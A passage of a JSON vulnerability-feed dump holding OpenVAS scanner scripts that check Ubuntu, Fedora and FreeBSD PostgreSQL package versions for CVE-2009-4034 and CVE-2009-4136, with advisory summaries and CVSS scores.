security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4_8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:22", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=546321", "https://bugzilla.redhat.com/show_bug.cgi?id=547662"], "pluginID": "136141256231066569", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "title": "Fedora Core 12 FEDORA-2009-13381 (postgresql)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066569", "id": "OPENVAS:136141256231066569", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13381.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13381 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.4.2-1\n- Update to PostgreSQL 8.4.2, for various fixes described at\nhttp://www.postgresql.org/docs/8.4/static/release-8-4-2.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\n- Use -N not the obsolete -n in useradd call\nResolves: #495727\n- Clean up specfile to eliminate rpmlint gripes, mainly by removing\nno-longer-needed provisions for superseding rh-postgresql\n- add sparc/sparc64 to multilib header support\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13381\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66569\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-13381 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:11", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=546321", "https://bugzilla.redhat.com/show_bug.cgi?id=547662"], "pluginID": "66566", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Fedora Core 11 FEDORA-2009-13363 (postgresql)", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66566", "id": "OPENVAS:66566", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13363.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13363 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.3.9-1\n- Update to PostgreSQL 8.3.9, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-9.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13363\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.\";\n\n\n\nif(description)\n{\n script_id(66566);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-13363 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:05:48", "references": ["http://www.postgresql.org/support/security", "http://www.securityfocus.com/bid/37334", "http://www.securityfocus.com/bid/37333", "http://www.postgresql.org/about/news.1170", "http://www.postgresql.org"], "pluginID": "1361412562310100400", "description": "PostgreSQL is prone to a security-bypass vulnerability because the\n application fails to properly validate the domain name in a signed CA\n certificate, allowing attackers to substitute malicious SSL\n certificates for trusted ones.\n\n PostgreSQL is also prone to a local privilege-escalation vulnerability.", "edition": 4, "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-12-16T00:00:00", "title": "PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2017-10-12T00:00:00", "id": "OPENVAS:1361412562310100400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100400", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: postgressql_37334.nasl 7406 2017-10-12 06:15:28Z cfischer $\n#\n# PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:postgresql:postgresql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100400\");\n script_version(\"$Revision: 7406 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-12 08:15:28 +0200 (Thu, 12 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-16 12:39:06 +0100 (Wed, 16 Dec 2009)\");\n script_bugtraq_id(37334,37333);\n script_cve_id(\"CVE-2009-4034\",\"CVE-2009-4136\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"postgresql_detect.nasl\");\n script_require_ports(\"Services/postgresql\", 5432);\n script_mandatory_keys(\"PostgreSQL/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37334\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37333\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org/support/security\");\n script_xref(name:\"URL\", value:\"http://www.postgresql.org/about/news.1170\");\n\n tag_summary = \"PostgreSQL is prone to a security-bypass vulnerability because the\n application fails to properly validate the domain name in a signed CA\n certificate, allowing attackers to substitute malicious SSL\n certificates for trusted ones.\n\n PostgreSQL is also prone to a local privilege-escalation vulnerability.\";\n\n tag_impact = \"Successfully exploiting this issue allows attackers to perform man-in-the-\n middle attacks or impersonate trusted servers, which will aid in further attacks.\n\n Exploiting the privilege-escalation vulnerability allows local attackers to gain elevated\n privileges.\";\n\n tag_affected = \"PostgreSQL versions prior to 8.4.2, 8.3.9, 8.2.15, 8.1.19, 8.0.23, and\n 7.4.27 are vulnerable to this issue.\";\n\n tag_solution = \"Updates are available. Please see the references for more information.\";\n\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"impact\", value:tag_impact);\n script_tag(name:\"affected\", value:tag_affected);\n script_tag(name:\"solution\", value:tag_solution);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"8.4\", test_version2:\"8.4.1\" ) ||\n version_in_range( version:vers, test_version:\"8.3\", test_version2:\"8.3.8\" ) ||\n version_in_range( version:vers, test_version:\"8.2\", test_version2:\"8.2.14\" ) ||\n version_in_range( version:vers, test_version:\"8.1\", test_version2:\"8.1.18\" ) ||\n version_in_range( version:vers, test_version:\"8.0\", test_version2:\"8.0.22\" ) ||\n version_in_range( version:vers, test_version:\"7.4\", test_version2:\"7.4.26\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:27", "references": [], "pluginID": "136141256231066611", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: postgresql-client, postgresql-server", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-2408", "CVE-2009-3230", "CVE-2009-4034", "CVE-2009-4136"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066611", "id": "OPENVAS:136141256231066611", "sourceData": "#\n#VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n postgresql-client\n postgresql-server\n\nCVE-2009-4034\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly handle a '\\0' character in a domain name in\nthe subject's Common Name (CN) field of an X.509 certificate, which\n(1) allows man-in-the-middle attackers to spoof arbitrary SSL-based\nPostgreSQL servers via a crafted server certificate issued by a\nlegitimate Certification Authority, and (2) allows remote attackers to\nbypass intended client-hostname restrictions via a crafted client\ncertificate issued by a legitimate Certification Authority, a related\nissue to CVE-2009-2408.\n\nCVE-2009-4136\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly manage session-local state during execution of\nan index function by a database superuser, which allows remote\nauthenticated users to gain privileges via a table with crafted index\nfunctions, as demonstrated by functions that modify (1) search_path or\n(2) a prepared statement, a related issue to CVE-2007-6600 and\nCVE-2009-3230.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66611\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: postgresql-client, postgresql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"postgresql-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"postgresql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:08", "references": [], "pluginID": "66611", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2009 